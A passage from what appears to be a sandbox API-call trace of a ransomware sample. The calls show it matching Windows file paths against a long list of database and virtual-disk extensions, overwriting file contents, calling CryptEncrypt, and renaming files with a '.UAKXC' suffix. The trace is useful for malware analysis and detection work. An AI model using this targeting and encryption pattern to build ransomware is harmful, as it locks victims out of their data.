lpSrch=".vsv") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.855] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.856] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.857] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.857] SetEndOfFile (hFile=0x6c8) returned 1 [0140.857] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.857] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x158, lpOverlapped=0x0) returned 1 [0140.857] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.857] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x158, lpOverlapped=0x0) returned 1 [0140.857] CloseHandle (hObject=0x6c8) returned 1 [0140.859] GetProcessHeap () returned 0xea0000 [0140.859] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.860] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" [0140.860] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.UAKXC" [0140.860] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.uakxc")) returned 1 [0140.861] GetProcessHeap () returned 0xea0000 [0140.861] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.861] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee860 | out: hHeap=0xea0000) returned 1 [0140.861] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf68 | out: hHeap=0xea0000) returned 1 [0140.861] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.861] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.861] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.862] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn")) returned 0x2022 [0140.863] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.863] GetLastError () returned 0x0 [0140.863] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=368) returned 1 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.863] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.864] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.865] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.866] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.867] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.868] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.869] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.870] StrStrIW 